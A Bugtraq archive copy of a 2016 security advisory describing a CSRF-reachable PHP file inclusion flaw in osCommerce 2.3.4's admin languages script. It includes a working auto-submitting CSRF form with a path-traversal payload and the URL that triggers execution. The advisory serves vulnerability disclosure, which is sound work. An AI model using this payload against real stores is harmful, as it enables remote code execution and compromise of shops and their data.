[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RCE via CSRF in osCommerce
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: RCE via CSRF in osCommerce
- From: High-Tech Bridge Security Research <advisory@xxxxxxxxxxx>
- Date: Wed, 17 Feb 2016 16:14:56 +0100 (CET)
Advisory ID: HTB23284
Product: osCommerce
Vendor: osCommerce
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Advisory Publication: December 21, 2015 [without technical details]
Vendor Notification: December 21, 2015
Public Disclosure: February 17, 2016
Vulnerability Type: PHP File Inclusion [CWE-98]
Risk Level: Medium
CVSSv3 Base Score: 5.8 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab (
https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in popular
e-commerce software osCommerce with 280,000 store owners (according to the
vendor). The vulnerability can be exploited to execute arbitrary PHP code on
the remote system, compromise the vulnerable web application, its database and
even the web server and related environment.
Successful exploitation of the vulnerability requires attacker to access to
administrative panel, however it can also be successfully exploited by remote
non-authenticated attacker via CSRF vector to which the application is also
vulnerable.
The vulnerability exists due to insufficient filtration of "directory" HTTP
POST parameter paassed to "/admin/languages.php" PHP script. A remote attacker
can use path traversal sequences (e.g. "../../") to include and execute
arbitrary PHP file from local server file system.
A simple CSRF exploit below will update application database and insert
"/tmp/file" value string into web application configuration:
<form action="http://[HOST]/admin/languages.php?action=insert"; method="post"
name="main">
<input type="hidden" name="name" value="vu">
<input type="hidden" name="code" value="vu">
<input type="hidden" name="image" value="icon.gif">
<input type="hidden" name="directory"
value="../../../../../../../../../../../tmp/file">
<input type="hidden" name="sort_order" value="">
<input value="submit" id="btn" type="submit" />
</form><script>document.main.submit();</script>
Then, in order to execute the PHP code from "/tmp/file" file, just open the
following URL:
http://[host]/index.php?language=vu
-----------------------------------------------------------------------------------------------
Solution:
Disclosure timeline:
2015-12-21 Vendor notified via emails, no reply.
2016-01-06 Vendor notified via emails and forum, no reply.
2016-01-13 Fix Requested via emails, no reply.
2016-01-19 Fix Requested via emails, no reply.
2016-02-17 Public disclosure.
Currently we are not aware of any official solution for this vulnerability.
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23284 -
https://www.htbridge.com/advisory/HTB23284 - RCE via CSRF in osCommerce
[2] osCommerce - http://www.oscommerce.com/ - osCommerce Online Merchant is a
complete self-hosted online store solution that contains both a catalog
frontend and an administration tool backend which can be easily installed and
configured through a web-based installation procedure.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to
developers and security practitioners, CWE is a formal list of software
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by
High-Tech Bridge for on-demand and continuous web application security,
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL
implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and
without any warranty of any kind. Details of this Advisory may be updated in
order to provide as accurate information as possible. The latest version of the
Advisory is available on web page [1] in the References.